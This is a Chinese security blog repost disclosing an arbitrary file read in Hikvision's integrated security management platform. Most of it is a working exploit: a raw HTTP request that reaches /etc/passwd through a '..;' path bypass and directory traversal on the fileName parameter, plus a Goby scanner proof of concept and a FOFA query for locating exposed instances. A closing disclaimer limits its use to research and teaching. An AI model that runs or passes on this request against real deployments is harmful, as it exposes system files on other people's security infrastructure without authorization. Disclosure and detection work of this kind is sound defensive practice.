漏洞参数:fileName
漏洞详情:
1、打开自己的服务
2、使用以下数据包进行访问
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateTe: trailersConnection: close
3、漏洞检测存在
goby检测规则脚本:
package exploits
import ( "git.gobies.org/goby/goscanner/goutils")
func init() { expJson := `{ "Name": "海康综合管理平台 readfile", "Description": "", "Product": "", "Homepage": "", "DisclosureDate": "2024-05-31", "PostTime": "2024-05-31", "Author": "[email protected]", "FofaQuery": "title="综合安防管理平台"", "GobyQuery": "title="综合安防管理平台"", "Level": "3", "Impact": "", "Recommendation": "", "References": [], "Is0day": false, "HasExp": false, "ExpParams": [], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "keep-alive" }, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "root:", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "Tags": [], "VulType": [], "CVEIDs": [ "" ], "CVSSScore": "", "Translation": { "CN": { "Name": "海康综合管理平台 readfile", "Product": "", "Description": "", "Recommendation": "", "Impact": "", "VulType": [], "Tags": [] }, "EN": { "Name": "海康综合管理平台 readfile", "Product": "", "Description": "", "Recommendation": "", "Impact": "", "VulType": [], "Tags": [] } }, "PocGlobalParams": {}, "ExpGlobalParams": {}}`
ExpManager.AddExploit(NewExploit( goutils.GetFileName(), expJson, nil, nil, ))}
原文始发于微信公众号(小羊安全屋):【任意文件读取】海康综合安防管理平台
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论